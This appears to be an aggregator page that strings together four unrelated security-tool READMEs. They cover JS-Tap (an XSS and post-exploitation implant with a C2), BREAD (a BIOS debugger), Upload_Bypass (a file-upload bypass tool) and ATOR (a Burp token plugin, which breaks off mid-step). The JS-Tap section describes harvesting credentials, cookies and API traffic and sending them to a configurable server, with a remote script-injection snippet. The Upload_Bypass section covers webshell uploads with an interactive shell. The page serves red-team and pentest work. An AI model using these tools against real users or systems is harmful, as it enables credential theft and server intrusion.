
JS-Tap - JavaScript Payload And Supporting Software To Be Used As XSS Payload Or Post Exploitation Implant To Monitor Users As They Use The Targeted Application

By: Zion3R


JavaScript payload and supporting software to be used as XSS payload or post exploitation implant to monitor users as they use the targeted application. Also includes a C2 for executing custom JavaScript payloads in clients.


Changelogs

Major changes are documented in the project Announcements:
https://github.com/hoodoer/JS-Tap/discussions/categories/announcements

Demo

You can read the original blog post about JS-Tap here:
https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams

Short demo from ShmooCon of JS-Tap version 1:
https://youtu.be/IDLMMiqV6ss?si=XunvnVarqSIjx_x0&t=19814

Demo of JS-Tap version 2 at HackSpaceCon, including C2 and how to use it as a post exploitation implant:
https://youtu.be/aWvNLJnqObQ?t=11719

A demo can also be seen in this webinar:
https://youtu.be/-c3b5debhME?si=CtJRqpklov2xv7Um

Upgrade warning

I do not plan on creating migration scripts for the database, and version number bumps often involve database schema changes (check the changelogs). You should probably delete your jsTap.db database on version bumps. If you have custom payloads in your JS-Tap server, make sure you export them before the upgrade.

Introduction

JS-Tap is a generic JavaScript payload and supporting software to help red teamers attack webapps. The JS-Tap payload can be used as an XSS payload or as a post exploitation implant.

The payload does not require the targeted user running the payload to be authenticated to the application being attacked, and it does not require any prior knowledge of the application beyond finding a way to get the JavaScript into the application.

Instead of attacking the application server itself, JS-Tap focuses on the client-side of the application and heavily instruments the client-side code.

The example JS-Tap payload is contained in the telemlib.js file in the payloads directory; however, any file in this directory is served unauthenticated. Copy the telemlib.js file to whatever filename you wish and modify the configuration as needed. This file has not been obfuscated. Prior to using it in an engagement, strongly consider renaming the endpoints, stripping comments, and heavily obfuscating the payload.

Make sure you review the configuration section below carefully before using on a publicly exposed server.

Data Collected

  • Client IP address, OS, Browser
  • User inputs (credentials, etc.)
  • URLs visited
  • Cookies (that don't have httponly flag set)
  • Local Storage
  • Session Storage
  • HTML code of pages visited (if feature enabled)
  • Screenshots of pages visited
  • Copy of Form Submissions
  • Copy of XHR API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body
  • Copy of Fetch API calls (if monkeypatch feature enabled)
    • Endpoint
    • Method (GET, POST, etc.)
    • Headers set
    • Request body and response body

Note: the ability to receive copies of XHR and Fetch API calls works in trap mode. In implant mode, only Fetch API calls can currently be copied.

Operating Modes

The payload has two modes of operation. Whether the mode is trap or implant is set in the initGlobals() function; search for the window.taperMode variable.

Trap Mode

Trap mode is typically the mode you would use as an XSS payload. Execution of XSS payloads is often fleeting: the user viewing the page where the malicious JavaScript payload runs may close the browser tab (the page isn't interesting) or navigate elsewhere in the application. In either case, the payload will be deleted from memory and stop working. JS-Tap needs to run for a long time or you won't collect useful data.

Trap mode combats this by establishing persistence using an iFrame trap technique. The JS-Tap payload will create a full page iFrame and start the user elsewhere in the application. This starting page must be configured ahead of time. In the initGlobals() function, search for the window.taperstartingPage variable and set it to an appropriate starting location in the target application.

In trap mode JS-Tap monitors the location of the user in the iframe trap and it spoofs the address bar of the browser to match the location of the iframe.

Note that the application targeted must allow iFraming from same-origin or self if it's setting CSP or X-Frame-Options headers. JavaScript based framebusters can also prevent iFrame traps from working.

Note: I've had good luck using trap mode for a post exploitation implant in very specific locations of an application, or when I'm not sure what resources the application is using inside the authenticated section of the application. You can put an implant in the login page, with trap mode and the trap mode start page set to window.location.href (i.e. the current location). The trap will be set when the user visits the login page, and they'll hopefully continue into the authenticated portions of the application inside the iframe trap.

A user refreshing the page will generally break/escape the iframe trap.

Implant Mode

Implant mode would typically be used if you're directly adding the payload into the targeted application. Perhaps you have a shell on the server that hosts the JavaScript files for the application. Add the payload to a JavaScript file that's used throughout the application (jQuery, main.js, etc.). Which file would be ideal really depends on the app in question and how it's using JavaScript files. Implant mode does not require a starting page to be configured, and does not use the iFrame trap technique.

A user refreshing the page in implant mode will generally continue to run the JS-Tap payload.

Installation and Start

Requires python3. A large number of dependencies are required for the jsTapServer, so you are highly encouraged to use python virtual environments to isolate the libraries for the server software (or whatever your preferred isolation method is).

Example:

mkdir jsTapEnvironment
python3 -m venv jsTapEnvironment
source jsTapEnvironment/bin/activate
cd jsTapEnvironment
git clone https://github.com/hoodoer/JS-Tap
cd JS-Tap
pip3 install -r requirements.txt

run in debug/single thread mode:
python3 jsTapServer.py

run with gunicorn multithreaded (production use):
./jstapRun.sh

A new admin password is generated on startup. If you didn't catch it in the startup print statements you can find the credentials saved to the adminCreds.txt file.

If an existing database is found by jsTapServer on startup it will ask you if you want to keep existing clients in the database or drop those tables to start fresh.

Note that on Mac I also had to install libmagic outside of python.

brew install libmagic

Playing with JS-Tap locally is fine, but to use it in a proper engagement you'll need to be running JS-Tap on a publicly accessible VPS and set up JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

Configuration

JS-Tap Server Configuration

Debug/Single thread config

If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

Proxy Mode

For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

If you set proxyMode to true, the JS-Tap server will run in HTTP mode and take the client IP address from the X-Forwarded-For header, which NGINX must be configured to set.
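As a minimal sketch (assuming JS-Tap is listening locally on the default port 8444; adjust to your own setup), the relevant part of the NGINX location block might look like:

location / {
    proxy_pass http://127.0.0.1:8444;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}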

When proxyMode is set to false, JS-Tap will run with a self-signed certificate, which is useful for testing. The client IP will be taken from the source IP of the client.

Data Directory

The dataDirectory parameter tells JS-Tap which directory to use for the SQLite database and the loot directory. Not all "loot" is stored in the database; screenshots and scraped HTML files in particular are not.
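As a rough illustration (the exact variable layout depends on your version of jsTapServer.py, and the path is just an example), these two settings might look like:

proxyMode     = True              # run HTTP behind NGINX; client IP read from X-Forwarded-For
dataDirectory = "./jsTapData/"    # example path; holds jsTap.db and the loot directory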

Server Port

To change the server port configuration see the last line of jsTapServer.py

app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

Gunicorn Production Configuration

Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

A big difference in configuration when using Gunicorn for serving the application is that you need to configure the number of workers (heavyweight processes) and threads (lightweight serving processes). JS-Tap is a very I/O heavy application, so using threads in addition to workers is beneficial in scaling up the application on multi-processor machines. Note that if you're using NGINX on the same box you need to configure NGINX to also use multiple processes so you don't bottleneck on the proxy itself.

At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use the number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX, I typically set worker_processes auto; in its configuration.

Proxy Mode is set by the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note the data directory variable needs a trailing '/' added.

The gunicorn startup script will use a self-signed cert when started with PROXYMODE set to False. You need to generate that self-signed cert first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

telemlib.js Configuration

These configuration variables are in the initGlobals() function.

JS-Tap Server Location

You need to configure the payload with the URL of the JS-Tap server it will connect back to.

window.taperexfilServer = "https://127.0.0.1:8444";

Mode

Set to either trap or implant. This is set with the variable:

window.taperMode = "trap";
or
window.taperMode = "implant";

Trap Mode Starting Page

Only needed for trap mode. See explanation in Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.

window.taperstartingPage = "http://targetapp.com/somestartpage";

If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

window.taperstartingPage = window.location.href;

Client Tag

Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of which payload was loaded. Remember that the entire /payloads directory is served; you can have multiple JS-Tap payloads configured with different modes, start pages, and client tags.

This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Set up multiple payloads, each with the appropriate configuration for the application it's being used against, and add a tag indicating which app the client is running.

window.taperTag = 'whatever';

Custom Payload Tasks

Used to set whether clients check for Custom Payload tasks, and how often they check. The jitter settings let you optionally set a floor and ceiling modifier. A random value between these two numbers will be picked and added to the check delay. Set both to 0 for no jitter.

window.taperTaskCheck        = true;
window.taperTaskCheckDelay = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop = 2000;

Exfiltrate HTML

true/false setting on whether a copy of the HTML code of each page viewed is exfiltrated.

window.taperexfilHTML = true;

Copy Form Submissions

true/false setting on whether to intercept a copy of all form posts.

window.taperexfilFormSubmissions = true;

MonkeyPatch APIs

Enable monkeypatching of the XHR and Fetch APIs. This works in trap mode; in implant mode, only the Fetch API is monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime. Enabling this feature will re-write the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Note that jQuery-based network calls will be captured via the XHR API, which jQuery uses under the hood for network calls.

window.monkeyPatchAPIs = true;

Screenshot after API calls

By default JS-Tap will capture a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can be configured to capture a new screenshot after an XHR or Fetch API call is made. These API calls are often used to retrieve new data to display. Two settings are offered: one to enable the "after API call screenshot" feature, and a delay in milliseconds. That many milliseconds after the API call, JS-Tap will capture the new screenshot.

window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;

JS-Tap Portal

Login with the admin credentials provided by the server script on startup.

Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

The clients list can be sorted by time (first seen, last update received) and the list can be filtered to only show the "starred" clients. There is also a quick filter search above the clients list that allows you to quickly filter clients that have the entered string. Useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

Each client has an 'x' button (near the star button). This allows you to delete the session for that client; if they're sending junk or useless data, you can prevent that client from submitting future data.

When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issued, select Session Settings at the top and you can disable new client sessions. You can also block specific IP addresses from receiving a session here.

Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc.) you can add it to the client notes. After you've reviewed all your clients and made your notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does). If you want to load the latest events for the client you need to select the client again on the left.

Custom Payloads

Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate that a client checks for custom payload tasks is variable, and that rate can be changed in the main JS-Tap payload configuration. That rate can be changed with a custom payload (calling the updateTaskCheckInterval(newDelay) function). The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

To run a payload on a single client, use the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

Tools

A few tools are included in the tools subdirectory.

clientSimulator.py

A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

At the top of the script is a numClients variable; set it to how many clients you want to simulate. The script will spawn a thread for each, retrieve a client session, and send data in, simulating a client.

numClients = 50

You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

apiServer = "https://127.0.0.1:8444"

JS-Tap run using gunicorn scales quite well.

MonkeyPatchApp

A simple app used for testing XHR/Fetch monkeypatching; it also gives you a basic app to test the payload against in general.

Run with:

python3 monkeyPatchLab.py

By default this will start the application running on:

https://127.0.0.1:8443

Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file; you can find this set in the injectPayload() function in main.js

function injectPayload()
{
    document.head.appendChild(Object.assign(document.createElement('script'),
        {src:'https://127.0.0.1:8444/lib/telemlib.js', type:'text/javascript'}));
}

formParser.py

An abandoned tool; it's a good start on analyzing HTML for forms and parsing out their parameters. It was intended to help automatically generate JavaScript payloads to target form posts.

You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

generateIntelReport.py

No longer working; this was used before JS-Tap had a web UI. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons; most of it is stored in the database, with the exception of exfiltrated HTML code and screenshots.

Contact

@hoodoer
hoodoer@bitwisemunitions.dev



Bread - BIOS Reverse Engineering And Advanced Debugging

By: Zion3R


BREAD (BIOS Reverse Engineering & Advanced Debugging) is an 'injectable' real-mode x86 debugger that can debug arbitrary real-mode code (on real HW) from another PC via serial cable.

Introduction

BREAD emerged from many failed attempts to reverse engineer legacy BIOS. Given that the vast majority -- if not all -- of BIOS analysis is done statically using disassemblers, understanding the BIOS becomes extremely difficult, since there's no way to know the value of registers or memory in a given piece of code.

That said, BREAD can also debug arbitrary real-mode code, such as bootable code or DOS programs.


How does it work?

This debugger is divided into two parts: the debugger (written entirely in assembly and running on the hardware being debugged) and the bridge, written in C and running on Linux.

The debugger is the injectable code, written in 16-bit real-mode, and can be placed within the BIOS ROM or any other real-mode code. When executed, it sets up the appropriate interrupt handlers, puts the processor in single-step mode, and waits for commands on the serial port.

The bridge, on the other hand, is the link between the debugger and GDB. The bridge communicates with GDB via TCP and forwards the requests/responses to the debugger through the serial port. The idea behind the bridge is to remove the complexity of GDB packets and establish a simpler protocol for communicating with the machine. In addition, the simpler protocol enables the final code size to be smaller, making it easier for the debugger to be injectable into various different environments.

As shown in the following diagram:

+---------+ simple packets +----------+   GDB packets  +---------+
|         |--------------->|          |--------------->|         |
|   dbg   |                |  bridge  |                |   gdb   |
|(real HW)|<---------------| (Linux)  |<---------------| (Linux) |
+---------+     serial     +----------+      TCP       +---------+

Features

By implementing the GDB stub, BREAD has many features out-of-the-box. The following commands are supported:

  • Read memory (via x, dump, find, and related commands)
  • Write memory (via set, restore, and related commands)
  • Read and write registers
  • Single-Step (si, stepi) and continue (c, continue)
  • Breakpoints (b, break) [1]
  • Hardware Watchpoints (watch and its siblings) [2]

Limitations

How many? Yes. Since the code being debugged is unaware that it is being debugged, it can interfere with the debugger in several ways, to name a few:

  • Protected-mode jump: If the debugged code switches to protected-mode, the structures for interrupt handlers, etc. are altered and the debugger will no longer be invoked at that point in the code. However, it is possible that a jump back to real mode (restoring the full previous state) will allow the debugger to work again.

  • IDT changes: If for any reason the debugged code changes the IDT or its base address, the debugger handlers will not be properly invoked.

  • Stack: BREAD uses a stack and assumes it exists! It should not be inserted into locations where the stack has not yet been configured.

For BIOS debugging there are other limitations, such as: it is not possible to debug the BIOS code from the very beginning (bootblock), as a minimum setup (such as RAM) is required for BREAD to function correctly. However, it is possible to perform a "warm-reboot" by setting CS:EIP to F000:FFF0. In this scenario, the BIOS initialization can be followed again, as BREAD is already properly loaded. Please note that the "code-path" of BIOS initialization during a warm-reboot may be different from a cold-reboot, and the execution flow may not be exactly the same.
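Assuming register writes work in your setup, a warm-reboot from the GDB prompt might look something like this (illustrative only):

(gdb) set $cs = 0xF000
(gdb) set $eip = 0xFFF0
(gdb) continue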

Building

Building only requires GNU Make, a C compiler (such as GCC, Clang, or TCC), NASM, and a Linux machine.

The debugger has two modes of operation: polling (default) and interrupt-based:

Polling mode

Polling mode is the simplest approach and should work well in a variety of environments. However, due to the polling nature, there is high CPU usage:

Building

$ git clone https://github.com/Theldus/BREAD.git
$ cd BREAD/
$ make

Interrupt-based mode

The interrupt-based mode optimizes CPU utilization by utilizing UART interrupts to receive new data, instead of constantly polling for it. This results in the CPU remaining in a 'halt' state until receiving commands from the debugger, and thus, preventing it from consuming 100% of the CPU's resources. However, as interrupts are not always enabled, this mode is not set as the default option:

Building

$ git clone https://github.com/Theldus/BREAD.git
$ cd BREAD/
$ make UART_POLLING=no

Usage

Using BREAD only requires a serial cable (and yes, your motherboard has a COM header, check the manual) and injecting the code at the appropriate location.

To inject, minimal changes must be made in dbg.asm (the debugger's src). The code's 'ORG' must be changed and also how the code should return (look for ">> CHANGE_HERE <<" in the code for places that need to be changed).

For BIOS (e.g., AMI Legacy):

Using an AMI Legacy BIOS as an example, where the debugger module will be placed in place of the BIOS logo (0x108200 or FFFF:8210), the following instructions in the ROM have been replaced with a far call to the module:

...
00017EF2 06      push es
00017EF3 1E      push ds
00017EF4 07      pop es
00017EF5 8BD8    mov bx,ax     -┐ replaced by: call 0xFFFF:0x8210 (dbg.bin)
00017EF7 B8024F  mov ax,0x4f02 -┘
00017EFA CD10    int 0x10
00017EFC 07      pop es
00017EFD C3      ret
...

the following patch is sufficient:

diff --git a/dbg.asm b/dbg.asm
index caedb70..88024d3 100644
--- a/dbg.asm
+++ b/dbg.asm
@@ -21,7 +21,7 @@
; SOFTWARE.

[BITS 16]
-[ORG 0x0000] ; >> CHANGE_HERE <<
+[ORG 0x8210] ; >> CHANGE_HERE <<

%include "constants.inc"

@@ -140,8 +140,8 @@ _start:

; >> CHANGE_HERE <<
; Overwritten BIOS instructions below (if any)
- nop
- nop
+ mov ax, 0x4F02
+ int 0x10
nop
nop

It is important to note that if you have altered a few instructions within your ROM to invoke the debugger code, they must be restored prior to returning from the debugger.

The reason for replacing these two instructions is that they are executed just prior to the BIOS displaying the logo on the screen, which is now the debugger, ensuring a few key points:

  • The logo module (which is the debugger) has already been loaded into memory
  • Video interrupts from the BIOS already work
  • The code around it indicates that the stack already exists

Finding a good location to call the debugger (where the BIOS has already initialized enough, but not too late) can be challenging, but it is possible.

After this, dbg.bin is ready to be inserted into the correct position in the ROM.

For DOS

Debugging DOS programs with BREAD is a bit tricky, but possible:

1. Edit dbg.asm so that DOS understands it as a valid DOS program:

  • Set the ORG to 0x100
  • Keep the useful code away from the beginning of the file (times)
  • Set the program exit (int 0x20)

The following patch addresses this:

diff --git a/dbg.asm b/dbg.asm
index caedb70..b042d35 100644
--- a/dbg.asm
+++ b/dbg.asm
@@ -21,7 +21,10 @@
; SOFTWARE.

[BITS 16]
-[ORG 0x0000] ; >> CHANGE_HERE <<
+[ORG 0x100]
+
+times 40*1024 db 0x90 ; keep some distance,
+ ; 40kB should be enough

%include "constants.inc"

@@ -140,7 +143,7 @@ _start:

; >> CHANGE_HERE <<
; Overwritten BIOS instructions below (if any)
- nop
+ int 0x20 ; DOS interrupt to exit process
nop

2. Create a minimal bootable DOS environment and run

Create a bootable FreeDOS (or DOS) floppy image containing just the kernel and the terminal: KERNEL.SYS and COMMAND.COM. Also add to this floppy image the program to be debugged and the DBG.COM (dbg.bin).

The following steps should be taken after creating the image:

  • Boot it with bridge already opened (refer to the next section for instructions).
  • Execute DBG.COM.
  • Once execution stops, use GDB to add any desired breakpoints and watchpoints relative to the next process you want to debug. Then, allow the DBG.COM process to continue until it finishes.
  • Run the process that you want to debug. The previously-configured breakpoints and watchpoints should trigger as expected.

It is important to note that DOS does not erase the process image after it exits. As a result, the debugger can be configured like any other DOS program and the appropriate breakpoints can be set. The beginning of the debugger is filled with NOPs, so it is anticipated that the new process will not overwrite the debugger's memory, allowing it to continue functioning even after it appears to be "finished". This allows BREAD to debug other programs, including DOS itself.

Bridge

Bridge is the glue between the debugger and GDB and can be used in different ways, whether on real hardware or virtual machine.

Its parameters are:

Usage: ./bridge [options]
Options:
  -s         Enable serial through socket, instead of device
  -d <path>  Replaces the default device path (/dev/ttyUSB0)
             (does not work if -s is enabled)
  -p <port>  Serial port (as socket), default: 2345
  -g <port>  GDB port, default: 1234
  -h         This help

If no options are passed the default behavior is:
  ./bridge -d /dev/ttyUSB0 -g 1234

Minimal recommended usages:
  ./bridge -s (socket mode, serial on 2345 and GDB on 1234)
  ./bridge    (device mode, serial on /dev/ttyUSB0 and GDB on 1234)

Real hardware

To use it on real hardware, just invoke it without parameters. Optionally, you can change the device path with the -d parameter:

Execution flow:
  1. Connect serial cable to PC
  2. Run bridge (./bridge or ./bridge -d /path/to/device)
  3. Turn on the PC to be debugged
  4. Wait for the message: Single-stepped, you can now connect GDB! and then launch GDB: gdb.

Virtual machine

For use in a virtual machine, the execution order changes slightly:

Execution flow:
  1. Run bridge (./bridge or ./bridge -d /path/to/device)
  2. Open the VM [3] (such as: make bochs or make qemu)
  3. Wait for the message: Single-stepped, you can now connect GDB! and then launch GDB: gdb.

In both cases, be sure to run GDB inside the BRIDGE root folder, as there are auxiliary files in this folder for GDB to work properly in 16-bit.
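If your setup does not connect automatically, a typical session from the bridge root folder (assuming the default GDB port of 1234) looks like:

$ gdb
(gdb) target remote :1234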

Contributing

BREAD is always open to the community and willing to accept contributions, whether issues, documentation, testing, new features, bugfixes, typos, etc. Welcome aboard.

License and Authors

BREAD is licensed under MIT License. Written by Davidson Francis and (hopefully) other contributors.

Footnotes

  1. Breakpoints are implemented as hardware breakpoints and therefore have a limited number of available breakpoints. In the current implementation, only 1 active breakpoint at a time!

  2. Hardware watchpoints (like breakpoints) are also only supported one at a time.

  3. Please note that debug registers do not work by default on VMs. For bochs, it needs to be compiled with the --enable-x86-debugger=yes flag. For Qemu, it needs to run with KVM enabled: --enable-kvm (make qemu already does this).



Upload_Bypass - File Upload Restrictions Bypass, By Using Different Bug Bounty Techniques Covered In Hacktricks

By: Zion3R


Upload_Bypass is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.

  • Simplifies the identification and exploitation of vulnerabilities in file upload mechanisms.
  • Leverages bug bounty techniques to maximize testing effectiveness.
  • Enables thorough assessments of web applications.
  • Provides an intuitive and user-friendly interface.
  • Enhances security assessments and helps protect critical systems.

New PoC Video:

Disclaimer

Please note that the use of Upload_Bypass and any actions taken with it are solely at your own risk. The tool is provided for educational and testing purposes only. The developer of Upload_Bypass is not responsible for any misuse, damage, or illegal activities caused by its usage.

While Upload_Bypass aims to assist Pentesters and Bug Hunters in testing file upload mechanisms, it is essential to obtain proper authorization and adhere to applicable laws and regulations before performing any security assessments. Always ensure that you have the necessary permissions from the relevant stakeholders before conducting any testing activities.

The results and findings obtained from using Upload_Bypass should be communicated responsibly and in accordance with established disclosure processes. It is crucial to respect the privacy and integrity of the tested systems and refrain from causing harm or disruption.

By using Upload_Bypass, you acknowledge that the developer cannot be held liable for any consequences resulting from its use. Use the tool responsibly and ethically to promote the security and integrity of web applications.

Features

  1. Webshell mode: The tool will try to upload a Webshell with a random name, and if the user specifies the location of the uploaded file, the tool enters an "Interactive shell".
  2. Eicar mode: The tool will try to upload an Eicar (anti-malware test file) instead of a Webshell, and if the user specifies the location of the uploaded file, the tool will check whether the file was uploaded successfully and exists on the system, in order to determine if an anti-malware product is present on the system.
  3. A directory with the name of the tested host will be created in the Tool's directory upon success, with the results saved in Excel and Text files.

Download:

Download the latest version from Releases page.

Installation:

pip install -r requirements.txt

Limitations:

The tool will not function properly if the file upload mechanism includes CAPTCHA implementation.

Perhaps in the future the tool will include an OCR.

Usage:

Attention

The tool is compatible exclusively with request output files generated by Burp Suite.

Before saving the Burp file, replace the file content with the string *content*, the filename.ext with the string *filename*, and the Content-Type header value with *mimetype* (only if the tool is not able to recognize it automatically).

How a request should look before the changes:


How it should look after the changes:


If the tool fails to recognize the mime type automatically, you can add *mimetype* as the value of the Content-Type header.
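For illustration only, a hypothetical multipart upload request after these edits might look like this (your request will differ):

POST /upload.php HTTP/1.1
Host: target.example
Content-Type: multipart/form-data; boundary=----boundary

------boundary
Content-Disposition: form-data; name="file"; filename="*filename*"
Content-Type: *mimetype*

*content*
------boundary--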

Options: -h, --help

 show this help message and exit

-b BURP_FILE, --burp-file BURP_FILE

 Required - Read from a Burp Suite file
Usage: -b / --burp-file ~/Desktop/output

-s SUCCESS_MESSAGE, --success SUCCESS_MESSAGE

 Required if -f is not set - Provide the success message when a file is uploaded
Usage: -s /--success 'File uploaded successfully.'

-f FAILURE_MESSAGE, --failure FAILURE_MESSAGE

 Required if -s is not set - Provide a failure message when a file is uploaded
Usage: -f /--failure 'File is not allowed!'

-e FILE_EXTENSION, --extension FILE_EXTENSION

 Required - Provide server backend extension
Usage: -e / --extension php (Supported extensions: php,asp,jsp,perl,coldfusion)

-a ALLOWED_EXTENSIONS, --allowed ALLOWED_EXTENSIONS

 Required - Provide allowed extensions to be uploaded
Usage: -a / --allowed jpeg, png, zip, etc.

-l WEBSHELL_LOCATION, --location WEBSHELL_LOCATION

  Provide a remote path where the WebShell will be uploaded (won't work if the file is uploaded with a UUID).
Usage: -l / --location /uploads/

-rl NUMBER, --rate-limit NUMBER

  Set rate-limiting with milliseconds between each request.
Usage: -rl / --rate-limit 700

-p PROXY_NUM, --proxy PROXY_NUM

  Channel the HTTP requests via proxy client (i.e Burp Suite).
Usage: -p / --proxy http://127.0.0.1:8080

-S, --ssl

  If set, the tool will not validate TLS/SSL certificate.
Usage: -S / --ssl

-c, --continue

  If set, the brute force will continue even if one of the methods gets a hit!
Usage: -c / --continue

-E, --eicar

  If set, an Eicar file(Anti Malware Testfile) will be uploaded only. WebShells will not be uploaded (Suitable for real environments).
Usage: -E / --eicar

-v, --verbose

  If set, details about the test will be printed on the screen
Usage: -v / --verbose

-r, --response

  If set, HTTP response will be printed on the screen
Usage: -r / --response

--version

  Print the current version of the tool.     

--update

  Checks for new updates. If there is a new update, it will be downloaded and updated automatically.     

Examples

Running the tool with Eicar and Bruteforce mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e php -a jpeg --response -v --eicar --continue

Running the tool with Webshell mode along with a verbose output

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e asp -a zip -v

Running the tool with a Proxy client

 python upload_bypass.py -b ~/Desktop/burp_output -s 'file upload successfully!' -e jsp -a png -v --proxy http://127.0.0.1:8080


Ator - Authentication Token Obtain and Replace Extender


The plugin is created to help automated scanning using Burp in the following scenarios:

  1. Access/Refresh token
  2. Token replacement in XML,JSON body
  3. Token replacement in cookies
    The above can be achieved using complex macros, session rules, or a custom extender in some scenarios. The rules become tricky and do not work in scenarios where the replacement text is JSON or XML.

Key advantages:

  1. We have achieved in-memory token replacement, avoiding the duplicate login requests needed by custom extenders and macros/session rules.
  2. Easy UX to help obtain data (from response) and replace data (in requests) using regex. This helps achieve complex scenarios where response body is JSON, XML and the request text is also JSON, XML, form data etc.
  3. Scan speed - the scan speed increases considerably because there are no extra login requests. There is a "Trigger Request", which is the error condition (it can also include a regex) that determines when the login requests are triggered. The error condition can include, for example, response code = 401 and body contains "Unauthorized request".

The inspiration for the plugin is from ExtendedMacro plugin: https://github.com/FrUh/ExtendedMacro

Blogs

  1. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part 1 - Single step login sequence and single token extraction
  2. Authentication Token Obtain and Replace (ATOR) Burp Plugin - Part 2 - Multi step login sequence and multiple extraction

Getting Started

  1. Install Java and Maven
  2. Clone the repository
  3. Run the "mvn clean install" command in the cloned repo where pom.xml is present
  4. Take the generated jar with dependencies from the target folder

Prerequisites

  1. Make sure a Java environment is set up on your machine.
  2. Configure Burp Suite to listen to the proxy traffic
  3. Configure the Java environment from the Extender tab of Burp

For usage with test application (Install this testing application (Tiredful application) from https://github.com/payatu/Tiredful-API)

Steps

  1. Identify the request which provides the error
  2. Identify the Error Pattern (details in section below)
  3. Obtain the data from the response using regex (see sample regex values)
  4. Replace this data on the request (use same regex as step 3 along with the variable name)

Error Pattern:

In total, there are 4 different ways you can specify the error condition.

  1. Status Code: 401, 400
  2. Error in Body: give any text from the body content (Example: Access token expired)
  3. Error in Header: give any text from the header (Example: Unauthorized)
  4. Free Form: use this to give multiple conditions (st=400 && bd=Access token expired || hd=Unauthorized)

Regex with samples

  1. Use Authorization: Bearer \w* to match Authorization: Bearer AXXFFPPNSUSSUSSNSUSN
  2. Use Authorization: Bearer ([\w+_.-]*) to match Authorization: Bearer AXX-F+FPPNS.USSUSSNSUSN

Break down into end to end tests

  1. Finding the Invalid request:
    • http://HOST:PORT/api/v1/exams/MQ==/ with invalid Bearer token.
  2. Identifying Error Pattern:
    • The above request will give you a 401; here the error condition is Status Code = 401
  3. Match regex with request data
    • Authorization: Bearer \w* - this regex will match access token which is passed.
  4. Replacement - How to replace
    • Replace the matched text (step 3 regex) with the extracted value (the extraction configuration is discussed below; say the variable name is "token")
    • Authorization: Bearer token - the extracted token will be substituted in.

Usage with test application

Idea: Record the Tiredful application request in Burp, configure the ATOR extender, and check whether the token is replaced by ATOR.

  1. Open the testing application in browser which you configured with BURP
    • Generate a token from http://HOST:PORT/handle-user-token/
